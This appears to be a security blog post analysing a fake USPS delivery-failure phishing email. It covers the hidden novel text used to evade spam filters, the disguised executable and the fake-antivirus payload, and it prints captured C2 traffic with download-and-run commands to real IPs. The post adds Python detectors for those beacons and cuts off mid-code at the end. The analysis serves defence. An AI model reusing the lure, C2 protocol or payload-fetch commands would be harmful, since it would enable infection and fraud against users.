This is a new take on an old trick, and a 'low-budget' one at that. Whatever the case, this email is also very much malicious. My fully patched Windows 7 sandbox was quickly popped by the bug without any effort. It also did not seem to matter that the user ID had only limited user privileges; I received no UAC approval window when it was triggered. Very disturbing.
There's no visible text in the email when displayed as HTML. But there is hidden text in the background that is probably intended to make the message appear legitimate to spam filters. The text itself appears to be pulled from 3 novels which have long since found their way into the public domain:
From "Artemus Ward (his travels) among the Mormons, Part 1" by John Camden Hotten (originally published in 1865)
. . .Sometimes they introduce a full brass and string band in Church. Brigham Young says the devil has monopolized the good music long enough, and it is high time the Lord had a portion of it. . .
From "A Fleece of Gold: Five Lessons from the Fable of Jason and Golden Fleece" by Charles Steward Given (originally published in 1905)
. . .Galen, the famous anatomist, after a prolonged study of the human hand, conceiving it to be the proximate instrument of the soul, was forced to renounce atheism, to acknowledge the existence of a Supreme Being. . .
From "The Entire PG Works by George Meredith, Volume 1 of 10" by George Meredith (originally published in 1851)
. . .Richard mechanically sat down on the crumbling flints to rest, and listened to the panting of the dog. Sprinkled at his feet were emerald lights: hundreds of glow- worms studded the dark dry ground. . .
I wonder how the original email author came upon these three distinctly different novels, as even in an internet-connected world it seems unlikely that they are just the result of a "What novels should I quote to bypass spam filters?" Google search.
That said, the user only sees a low quality jpg image (pulled from http://bdedieu [DOT] perso [DOT] neuf [DOT] fr/HIDVRTXUKI [DOT] jpg) when they open the message claiming that USPS failed to deliver a package. . .
USPS.COM
Unfortunately, we failed to deliver the postal package you have sent on the 27th of august in time, because the recipient's address is erroneous.
Please go to the nearest UPS office and show your shipping label.
If the parcel isn't received within 30 working days our company will have the right claim compensation from you for each day of keeping.
Low quality JPG referring to a phantom parcel
Not sure why I would be taking a USPS/United States Postal Service receipt to a UPS/United Parcel Service office, but whatever.
Clicking on the image sends the user to http://bdedieu [DOT] perso [DOT] neuf [DOT] fr/XREOWCDHOS [DOT] htm, which contains only a very simple piece of JavaScript commanding the browser to download a file named Label_Copy_USPS [DOT] zip. . .
JavaScript to download the Label_Copy_USPS file
The zip file itself contains a malicious file named Label_Copy_USPS [DOT] exe, with an embedded icon that makes it look like an MS Word document to the untrained eye.
Not really a Word document, no matter what it says
Unique File Details:
Filename -- Label_Copy_USPS [DOT] exe
File size -- 88576 bytes (86.5 KB)
Filetype -- PE32 executable for MS Windows (GUI) Intel 80386 32-bit (Win32 Executable Generic)
MD5 Hash -- 7c35f845a49f95e6797ee89073cf1d89
SHA1 Hash -- 8dc099b23270b70a42dad714a230c4b51eb06175
SHA256 Hash -- 254dd09af71c45cbad147aa523cf7f277340c1e0799fba9b36f20942f295c63d
Online malware scanners identified the file as:
AntiVir -- TR/Crypt.ZPACK.Gen
Avira -- TR/Crypt.ZPACK.Gen
Eset -- Win32/Kryptik.ALDT (Variant)
F-Prot -- W32/Falab.J6.gen!Eldorado
Kaspersky Lab -- Trojan-Downloader.Win32.Kuluoz.ar
McAfee -- Generic BackDoor.adp
Norman -- W32/Obfuscated.D!genr
Sophos -- Mal/EncPk-AGK
The file also appears to have authentic metadata, though it could just as easily be another misdirect.
File Description: Fatal Hums 32
Company: EPoX
File Version: 2.2.0.1112
Date Created: 8/30/2012 6:57 AM
Size: 86.5 KB
Opened the file in the sandbox and confirmed its malicious nature.
It appears to execute, but doesn't display anything but an empty document in notepad named "Label_Copy_USPS". Not sure if that's just for appearance, or if it's exploiting something in notepad on my fully patched sandbox machine.
Just an empty notepad document
The Label_Copy_USPS.exe file with the MSWord icon has also been replaced with an empty text file named Label_Copy_USPS.txt.
After that, nothing else. At least for a few minutes.
Then I get a popup for something called Security Monitor claiming:
Security Monitor: WARNING!
Attention! System detected a potential hazard (TrojanSPM/LX) on your computer
that may infect executable files. Your private information and PC Safety
is at risk.
To get rid of unwanted spyware and keep your computer safe you need to update your computer security software.
Click Yes to download official intrusion detection system (IDS software)
Bogus Security Monitor Warning
Followed by an ominous system tray flag. . .
WARNING!
Application cannot be executed. The file notepad.exe is infected.
Please activate your antivirus software.
Bogus Infected File Flag
And then conveniently a scan from Live Security Platinum (one of the Fake Antivirus variants) which I of course didn't knowingly install. . .
Live Security Platinum (one of the Fake Antivirus variants)
I've seen these before, and it always amuses me how it claims certain applications on the machine are infected (even though they are not actually installed).
But whatever the case, it throws the expected "Your machine is infected with many malicious bugs, It is highly recommended that you remove all the threats from your computer immediately" message.
Bogus Infected Machine Warning
And of course clicking on the button takes the user to an online website asking for a credit card number.
Basically anything that I did on the machine from this point on triggered an alert claiming that whatever application I was trying to open was infected, right after the process was terminated for my 'safety'.
But that's not all that's going on. . .
Behind the scenes, this all starts with an HTTP connection on TCP port 84 to a Netherlands IP (93.184.100.116), which pulls down another malicious exe file named 3b0c6a8305cc89cf77f3c9616a569e78 [DOT] exe. . .
GET /d0f7718d96B962A24D5DB24495EF4073722C70A2F37B8ED45222F5F57F5006B4F30287DE5E832CD19BA0C26553344C35D1833C79DC573864758807A47C3CED5B939DECA6688F364B7F8C HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 93.184.100.116:84
HTTP/1.1 200 OK
Server: nginx/0.8.55
Date: Thu, 30 Aug 2012 20:53:14 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze13
Vary: Accept-Encoding
Content-Length: 49
c=run&u=/get/3b0c6a8305cc89cf77f3c9616a569e78 [DOT] exe
GET //get/3b0c6a8305cc89cf77f3c9616a569e78 [DOT] exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
Host: 93.184.100.116:84
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/0.8.55
Date: Thu, 30 Aug 2012 20:53:14 GMT
Content-Type: application/x-msdos-program
Connection: keep-alive
Last-Modified: Thu, 30 Aug 2012 20:30:04 GMT
ETag: "ddc0f1-66a00-4c8818a54eb00"
Accept-Ranges: bytes
Content-Length: 420352
MZ......................@...............................................!..L.!This program cannot be run in DOS mode. [FILE CONTINUES]
And then it pulls yet another malicious file, passF [DOT] dll [DOT] crp. . .
GET /d0f7718d96B962A24D5DB24495EF4073722C70A2F37B8ED45222F5F57F5006B4F30287DE5E832CD19BA0C26553344C35D1833C79DC573864758807A47C3CED5B939DECA6688F364B7F8C HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 93.184.100.116:84
HTTP/1.1 200 OK
Server: nginx/0.8.55
Date: Thu, 30 Aug 2012 20:55:18 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze13
Vary: Accept-Encoding
Content-Length: 49
c=rdl&u=/get/passF.dll.crp&a=0&k=00005f73&n=passF
GET //get/passF.dll.crp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 93.184.100.116:84
HTTP/1.1 200 OK
Server: nginx/0.8.55
Date: Thu, 30 Aug 2012 20:55:18 GMT
Content-Type: application/x-msdos-program
Connection: keep-alive
Last-Modified: Fri, 24 Aug 2012 12:47:50 GMT
ETag: "ddc0f8-1a9e00-4c80262356980"
Accept-Ranges: bytes
Content-Length: 1744384
>...p_..w_......._..s_..3_..s_..s_..s_..s_..s_..s_..s_..s_..{^..}@..s...R..L.~Th., p.0gr.2 c.1no..beS-unS6n 7.S .0de]R
W_..s_..+...oO..oO..[FILE CONTINUES]
And because that clearly wasn't enough, it connects to Hong Kong (175.41.28.156) to log itself as 'installed'. . .
GET /api/stats/install/?ts=26070510&affid=41100&ver=3060001&group=liv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent:
Host: 175.41.28.156
HTTP/1.1 200 OK
Server: nginx/1.2.3
Date: Thu, 30 Aug 2012 20:56:18 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
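The two check-ins to 93.184.100.116:84 and the install-stats call to 175.41.28.156 share several traits a defender can key on: a non-standard port, a User-Agent claiming a Windows version that never shipped ("Windows NT 9.0"), an empty User-Agent, a request path that is one long hex blob, and a 49-byte "text/html" response that is really a c=run / c=rdl command string. The following is an added example, not code from the original write-up; the sample messages are constructed from the captures above (with the downloaded file name written with a plain dot) and the scoring rules are my own.

```python
"""Added example (not from the original write-up): heuristic triage of the
HTTP check-ins captured above. Sample messages are constructed from the
captures in the post; the scoring rules are my own."""
import re
from urllib.parse import parse_qs

# Windows NT version strings that have actually shipped. The downloader's
# User-Agent claims "Windows NT 9.0", which never existed.
KNOWN_NT_VERSIONS = {"5.0", "5.1", "5.2", "6.0", "6.1", "6.2", "6.3", "10.0"}
# Request path that is one long hex blob with no file name or extension.
HEX_BLOB_PATH = re.compile(r"^/[0-9A-Fa-f]{64,}$")
# Response body shaped like "c=<command>&u=<path>" rather than HTML.
COMMAND_BODY = re.compile(r"^c=[a-z]+&u=")


def parse_http(raw):
    """Split one HTTP message into (start line, lower-cased header dict, body)."""
    head, _, body = raw.strip("\n").partition("\n\n")
    lines = head.splitlines()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def analyze_exchange(request_raw, response_raw):
    """Return (reasons, command) for one request/response pair.

    reasons is the list of indicator names that fired; command is the parsed
    c=...&u=... body when the server answered with one, otherwise None."""
    req_line, req_hdr, _ = parse_http(request_raw)
    _, resp_hdr, resp_body = parse_http(response_raw)
    reasons = []

    path = req_line.split(" ")[1]
    host = req_hdr.get("host", "")
    port = host.rsplit(":", 1)[1] if ":" in host else "80"
    if port not in ("80", "443"):
        reasons.append("nonstandard-port")

    ua = req_hdr.get("user-agent", "")
    if not ua:
        reasons.append("empty-user-agent")
    nt = re.search(r"Windows NT (\d+\.\d+)", ua)
    if nt and nt.group(1) not in KNOWN_NT_VERSIONS:
        reasons.append("bogus-windows-version")

    if HEX_BLOB_PATH.match(path):
        reasons.append("hex-blob-path")

    command = None
    body = resp_body.strip()
    ctype = resp_hdr.get("content-type", "")
    if ctype.startswith("text/html") and COMMAND_BODY.match(body):
        reasons.append("command-body")
        command = {k: v[0] for k, v in parse_qs(body).items()}
    if ctype.startswith("application/x-msdos-program") or body.startswith("MZ"):
        reasons.append("executable-download")
    return reasons, command


# Constructed from the first check-in in the capture (port 84, hex path).
CHECKIN_REQUEST = """GET /d0f7718d96B962A24D5DB24495EF4073722C70A2F37B8ED45222F5F57F5006B4F30287DE5E832CD19BA0C26553344C35D1833C79DC573864758807A47C3CED5B939DECA6688F364B7F8C HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 93.184.100.116:84
"""
CHECKIN_RESPONSE = """HTTP/1.1 200 OK
Server: nginx/0.8.55
Content-Type: text/html
Content-Length: 49

c=run&u=/get/3b0c6a8305cc89cf77f3c9616a569e78.exe
"""
# Constructed from the install-stats call (note the empty User-Agent).
STATS_REQUEST = """GET /api/stats/install/?ts=26070510&affid=41100&ver=3060001&group=liv HTTP/1.1
User-Agent:
Host: 175.41.28.156
"""
STATS_RESPONSE = """HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 0
"""
# Constructed benign exchange for contrast (hypothetical host).
BENIGN_REQUEST = """GET /index.html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/5.0)
Host: www.example.com
"""
BENIGN_RESPONSE = """HTTP/1.1 200 OK
Content-Type: text/html

<html>hello</html>
"""

if __name__ == "__main__":
    for name, req, resp in (("checkin", CHECKIN_REQUEST, CHECKIN_RESPONSE),
                            ("stats", STATS_REQUEST, STATS_RESPONSE),
                            ("benign", BENIGN_REQUEST, BENIGN_RESPONSE)):
        print(name, analyze_exchange(req, resp))
```

The command parser is what turns a bare alert into something actionable: the "u=" value names the next payload path, so it can be pulled straight into a blocklist or a proxy rule without a human reading the raw capture.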
Then the bug silently completes a form in Kazakhstan (195.210.47.109) and downloads a spam email template. . .
POST /index.php HTTP/1.1
Host: 195.210.47.109:80:80
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.1; SV1; .NET CLR 1.1.4777)
Accept: */*
Accept-Language: en-gb
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 746
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="sid"
0549571111555245
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="up"
13849612
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wbfl"
1
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="v"
137
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ping"
457
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="guid"
{DAB0CFA5-8A9B-4160-8DA8-8F2A01AC8EF6}
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wv"
6#2#1#0#7601#0
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="sr"
0
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ar"
0
--1BEF0A57BE110FD467A--
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Aug 2012 20:56:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.3.3-7+squeeze13
Vary: Accept-Encoding
f4a
HTTP/1.1 200 OK
Date: Thu, 30 Aug 2012 20:56:29 GMT
Server: Apache/2.2.16
Content-Length: 55876
Connection: close
Content-Type: multipart/form-data; boundary="1BEF0A57BE110FD467A"
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="COMMON"; filename="COMMON.BIN"
Content-Type: application/octet-stream
'hr.%+./".,****...)/.'4hr.%.'ywtxp%.'m%.***.'4m%.'h%**/5)+)5)/,5*#)!#/.*,(5)(+5*(*5*-#!#/.*,(5##5.5(!#+.*##5*(#5".5*((!#/.)+(5*(+5*)"5.#!#/.)+"5)+5,#5)/*!#/.-#5*,(5*#)5*)#!#/.,)5..[FILE CONTINUES]
Once that is downloaded, the sandbox becomes a mail zombie and starts blasting the world. . .
Meanwhile. . . the bug is also trying to pull down more badness from Germany (78.159.108.83). . .
GET /ajax/libs/jquery/1.6.4/jquery [DOT] min [DOT] js HTTP/1.1
Accept: */*
Referer: http://chechoutbiz [DOT] com/p/liv/?group=liv&ver=3060001&reject_url=http%3A%2F%2Fchechoutbiz [DOT] com%3A80%2Fp%2Fdecline%2F%3Fgroup%3Dliv%26ver%3D3060001%26nid%3DD0F7718D%26affid%3D41100&nid=D0F7718D&affid=41100
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
Connection: Keep-Alive
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Type: text/javascript; charset=UTF-8
Last-Modified: Mon, 02 Apr 2012 18:24:28 GMT
Date: Thu, 30 Aug 2012 18:41:47 GMT
Expires: Fri, 30 Aug 2013 18:41:47 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 32103
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 8101
............y..../....MD...j..v.%`C...-..K..aS.....H.Zr......SU(......}...(.j=u.:K.i.l...|....U.?{..M..M...........C.p.-..2.W...i.....U./.+?VIpo...[?.....v.:....O.*[.Q.0...j...?l.(..<[FILE CONTINUES]
And then yet another file from Missouri (209.20.78.241) via TCP port 84. . .
GET /d0f7718d96B962A24D5DB24495EF4073722C70A2F37280D51B2FB5E0240E44F8B14D849155C63ADBC2A2CA31 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 209.20.78.241:84
HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Thu, 30 Aug 2012 21:03:11 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze13
Vary: Accept-Encoding
Content-Length: 225
..9.......Q0.r+..W..As..yP........k....mEq.v..j!...fg.@.o?.Y....|.4rh.....5^.....{.j..q.SK.q.....U..........'2.e9..IrKJe.,zSo/..o.a8_.cf.......~(MD.+.P.........f...?......M..^{Q.|.f...@.;.%Y.(.K..8PF..S..\l.%..W..v.&8a.KR....
And then back to Germany (slopokan21 [DOT] ru) to fill out another online form. . .
POST /index [DOT] php HTTP/1.1
Host: slopokan21 [DOT] ru:80
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.1; SV1; .NET CLR 1.1.4777)
Accept: */*
Accept-Language: en-gb
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 2936
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="sid"
2505323811778201
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="up"
14097139
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wbfl"
0
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="v"
137
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ping"
457
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="guid"
{DAB0CFA5-8A9B-4160-8DA8-8F2A01AC8EF6}
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wv"
6#2#1#0#7601#29
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ms"
758019024:121:2000:0:0:0:25:0:0:0:0:0:0:0:0:0:0
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="smtx"
CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="sr"
0
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ar"
0
--1BEF0A57BE110FD467A--
HTTP/1.0 303 See Other
Location: http://slopokan21 [DOT] ru:80/index [DOT] php
Content-Length: 0
Connection: close
Date: Thu, 30 Aug 2012 21:00:40 GMT
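Both multipart POSTs (to 195.210.47.109 and to slopokan21 [DOT] ru) use the identical boundary string 1BEF0A57BE110FD467A and carry the same guid, which is what lets a defender tie the two beacons to one infected host and write a signature on the boundary itself (a real client generates a fresh random boundary per request). The following is an added example, not code from the original write-up; it parses beacons of this shape and correlates them by guid. The sample field lists are constructed from the two captured POSTs (the second one shortened and without the long smtx blob), and the build_multipart helper only exists to lay those samples out the way the captures are.

```python
"""Added example (not from the original write-up): parser for the
multipart/form-data beacons the downloader POSTs, plus correlation of
beacons by the embedded GUID. Sample bodies are constructed from the two
POSTs in the capture; the indicator rules are my own."""
import re

# Both captured POSTs use this exact boundary; a fixed boundary is a usable
# network signature because real clients generate a random one per request.
STATIC_BOUNDARY = "1BEF0A57BE110FD467A"
# Field names present in both captured beacons.
BEACON_FIELDS = {"sid", "up", "wbfl", "v", "ping", "guid", "wv", "sr", "ar"}


def build_multipart(boundary, pairs):
    """Encode name/value pairs in the layout the captured beacons use
    (used here only to construct the sample bodies)."""
    parts = ['--%s\nContent-Disposition: form-data; name="%s"\n\n%s\n'
             % (boundary, name, value) for name, value in pairs]
    return "".join(parts) + "--%s--\n" % boundary


def boundary_from_content_type(content_type):
    m = re.search(r'boundary="?([^";\s]+)"?', content_type)
    if not m:
        raise ValueError("no multipart boundary in Content-Type")
    return m.group(1)


def parse_multipart_form(content_type, body):
    """Return {field name: value} for a multipart/form-data body."""
    boundary = boundary_from_content_type(content_type)
    fields = {}
    for part in body.split("--" + boundary):
        part = part.strip()
        if not part or part == "--":      # preamble or closing delimiter
            continue
        head, _, value = part.partition("\n\n")
        name = re.search(r'name="([^"]+)"', head)
        if name:
            fields[name.group(1)] = value.strip()
    return fields


def beacon_indicators(content_type, fields):
    """Indicators that a parsed POST looks like one of these beacons."""
    reasons = []
    if boundary_from_content_type(content_type) == STATIC_BOUNDARY:
        reasons.append("static-boundary")
    if BEACON_FIELDS.issubset(fields):
        reasons.append("beacon-field-set")
    return reasons


def correlate_by_guid(beacons):
    """beacons: iterable of (destination, content_type, body).
    Returns {guid: sorted destinations that received a beacon with it}."""
    seen = {}
    for dest, ctype, body in beacons:
        guid = parse_multipart_form(ctype, body).get("guid")
        if guid:
            seen.setdefault(guid, set()).add(dest)
    return {g: sorted(d) for g, d in seen.items()}


# Constructed from the captured POSTs (second one shortened).
BEACON_CONTENT_TYPE = "multipart/form-data; boundary=" + STATIC_BOUNDARY
GUID = "{DAB0CFA5-8A9B-4160-8DA8-8F2A01AC8EF6}"
BEACON_1 = build_multipart(STATIC_BOUNDARY, [
    ("sid", "0549571111555245"), ("up", "13849612"), ("wbfl", "1"),
    ("v", "137"), ("ping", "457"), ("guid", GUID),
    ("wv", "6#2#1#0#7601#0"), ("sr", "0"), ("ar", "0")])
BEACON_2 = build_multipart(STATIC_BOUNDARY, [
    ("sid", "2505323811778201"), ("up", "14097139"), ("wbfl", "0"),
    ("v", "137"), ("ping", "457"), ("guid", GUID),
    ("wv", "6#2#1#0#7601#29"),
    ("ms", "758019024:121:2000:0:0:0:25:0:0:0:0:0:0:0:0:0:0"),
    ("sr", "0"), ("ar", "0")])
SAMPLE_BEACONS = [("195.210.47.109", BEACON_CONTENT_TYPE, BEACON_1),
                  ("slopokan21[.]ru", BEACON_CONTENT_TYPE, BEACON_2)]

if __name__ == "__main__":
    for dest, ctype, body in SAMPLE_BEACONS:
        fields = parse_multipart_form(ctype, body)
        print(dest, fields["guid"], beacon_indicators(ctype, fields))
    print(correlate_by_guid(SAMPLE_BEACONS))
```

The parser is deliberately permissive (it ignores Content-Type sub-headers and tolerates a quoted or unquoted boundary) because the point is to extract the guid from whatever the bot sends, not to validate the request; validation would reject the malformed "Host: 195.210.47.109:80:80" header long before reaching the body.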
The connections and downloads continue with zero sign of stopping. And again, all of this is taking place silently behind the scenes without the user ever knowing.
Good times.
Original source email (minus the HTML formatting):
Delivered-To: christoperj
Received: by 10.231.42.212 with SMTP id t20csp39528ibe;
Thu, 30 Aug 2012 09:52:10 -0700 (PDT)
Received: by 10.50.236.39 with SMTP id ur7mr1239726igc.62.1346345530047;
Thu, 30 Aug 2012 09:52:10 -0700 (PDT)
Return-Path:
Received: from mailforward. (mailforward.. [10.10.10.23])
by mx. with ESMTP id i2si3576532icy.69.2012.08.30.09.52.09;
Thu, 30 Aug 2012 09:52:10 -0700 (PDT)
Received-SPF: neutral (: 10.10.10.23 is neither permitted nor denied by best guess record for domain of www@suzan.yourwebhost [DOT] com) client-ip=10.10.10.23;
Authentication-Results: mx.; spf=neutral (: 10.10.10.23 is neither permitted nor denied by best guess record for domain of www@suzan.yourwebhost [DOT] com) smtp.mail=www@suzan.yourwebhost [DOT] com
Received: from mx1. (inbound-us1. [70.87.28.133])
by mailforward. (Postfix) with ESMTP id 72C0E162C3C6
for; Thu, 30 Aug 2012 16:52:09 +0000 (GMT)
Received: from suzan.yourwebhost [DOT] com (suzan [DOT] yourwebhost [DOT] com [209.239.43.1])
by mx1. (Postfix) with ESMTP id 58343471681
for; Thu, 30 Aug 2012 16:52:09 +0000 (GMT)
Received: (from www@localhost)
by suzan.yourwebhost [DOT] com (8.14.3/8.12.10) id q7UGq3Uc015428;
Thu, 30 Aug 2012 12:52:03 -0400
Date: Thu, 30 Aug 2012 12:52:03 -0400
Message-Id: <201208301652.q7UGq3Uc015428@suzan.yourwebhost [DOT] com>
To: christoperj
Subject: Delivery refuse ID#36556
From: "USPS Customer Service"
X-Mailer: CF-XPInformer
Reply-To: "USPS Customer Service"
Mime-Version: 1.0
Content-Type:multipart/mixed;boundary="----------1346345523503F9A33361C5"
X-CTCH-Spam: Suspect
X-CTCH-VOD: Unknown
X-CTCH-RefID: str=0001.0A0B0209.503F9A39.0103,ss=2,re=0.000,recu=0.000,reip=0.000,cl=2,cld=1,fgs=0
------------1346345523503F9A33361C5
[LINK TO http://bdedieu [DOT] perso [DOT] neuf [DOT] fr/XREOWCDHOS [DOT] htm USING IMAGE FILE POINTING TO http://bdedieu [DOT] perso [DOT] neuf [DOT] fr/HIDVRTXUKI [DOT] jpg]
There are no ravishingly beautiful women present, and no positively ugly ones.The men are fair to middling. They will never be slain in cold blood for their beauty, nor shut up in jail for their homeliness. There are some good voices in the choir to-day, but the orchestral accompaniment is unusually slight. Sometimes they introduce a full brass and string band in Church. Brigham Young says the devil has monopolized the good music long enough, and it is high time the Lord had a portion of it. Therefore trombones are tooted on Sundays in Utah as well as on other days; and there are some splendid musicians there. The Orchestra in Brigham Youngs theatre is quite equal to any in Broadway. There is a youth in Salt Lake City (I forget his name) who plays the cornet like a North American angel. Mr. Stenhouse relieves me of any anxiety I had felt in regard to having my swan-like throat cut by the Danites, but thinks my wholesale denunciation of a people I had never seen was rather hasty.
And the plaudits of men and of angels attend the young man today who has a worthy object in view, who believes in himself, and bends to the oars with might and main.An active hand symbolizes usefulness and thrift. Has it ever occurred to you what a wonderful piece of mechanism is that hand with which Nature has equipped you for seizing the oars of lifes activities? Galen, the famous anatomist, after a prolonged study of the human hand, conceiving it to be the proximate instrument of the soul, was forced to renounce atheism, to acknowledge the existence of a Supreme Being. Scientists regard the human hand as being the most remarkable organ, not vital, in the whole animal kingdom. It is conceded to be, also, the most pronounced physical characteristic differentiating man from the lower animals. The chimpanzee and the gorilla, closely allied to the human species in many respects, are noticeably deficient in the use of their modified hands; being able to grasp things only in a cumbersome way.
Tongue out of mouth trotted the little dog after him; crouched panting when he stopped an instant; rose weariedly when he started afresh.Now and then a large white night-moth flitted through the dusk of the forest. On a barren corner of the wooded highland looking inland stood grey topless ruins set in nettles and rank grass-blades. Richard mechanically sat down on the crumbling flints to rest, and listened to the panting of the dog. Sprinkled at his feet were emerald lights: hundreds of glow- worms studded the dark dry ground. He sat and eyed them, thinking not at all. His energies were expended in action. He sat as a part of the ruins, and the moon turned his shadow Westward from the South. Overhead, as she declined, long ripples of silver cloud were imperceptibly stealing toward her. They were the van of a tempest. He did not observe them or the leaves beginning to chatter.
------------1346345523503F9A33361C5--
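The headers above carry most of the evidence a mail gateway needs even before the body is looked at: SPF came back neutral for an envelope sender at a web host, the display name claims USPS while the authenticated sender domain has nothing to do with the carrier, the message originated from a web script (from www@localhost), the gateway's own filter marked it Suspect, and the subject is a delivery-failure lure. The following is an added example, not code from the original write-up; it runs those checks over a constructed header set modelled on the email above, with the real sender domains replaced by .example placeholders and the scoring rules being my own.

```python
"""Added example (not from the original write-up): header triage for the
USPS-themed lure using the standard-library email parser. Sample headers
are constructed from the ones in the post with the sender domains replaced
by .example placeholders; the indicator rules are my own."""
import email
import re

# Carrier brands a delivery-notice lure tends to impersonate.
BRANDS = ("usps", "ups", "fedex", "dhl")
LURE_WORDS = re.compile(r"\b(deliver\w*|parcel|package|shipment|shipping)\b", re.I)


def display_name(from_header):
    """'"USPS Customer Service" <a@b>' -> 'USPS Customer Service'."""
    return from_header.split("<")[0].strip().strip('"').strip()


def triage_headers(raw):
    """Return the list of indicator names found in the message headers."""
    msg = email.message_from_string(raw)
    reasons = []

    auth = msg.get("Authentication-Results", "")
    spf = re.search(r"spf=(\w+)", auth)
    if spf and spf.group(1).lower() != "pass":
        reasons.append("spf-not-pass")

    # Brand named in the display name but absent from the authenticated
    # envelope sender's domain (smtp.mail=... in Authentication-Results).
    name = display_name(msg.get("From", "")).lower()
    brand = next((b for b in BRANDS if b in name.split()), None)
    mail_from = re.search(r"smtp\.mail=\S+?@([\w.\-]+)", auth)
    if brand and mail_from and brand not in mail_from.group(1).lower():
        reasons.append("brand-name-sender-mismatch")

    if LURE_WORDS.search(msg.get("Subject", "")):
        reasons.append("delivery-lure-subject")

    # Message injected by a local web script rather than a mail client.
    if any(re.search(r"\(from www@localhost\)", r)
           for r in msg.get_all("Received", [])):
        reasons.append("web-script-origin")

    if msg.get("X-CTCH-Spam", "").strip().lower() == "suspect":
        reasons.append("gateway-flagged-suspect")
    return reasons


# Constructed from the headers in the post (domains are placeholders).
LURE_HEADERS = """Received: from suzan.yourwebhost.example (suzan.yourwebhost.example [209.239.43.1])
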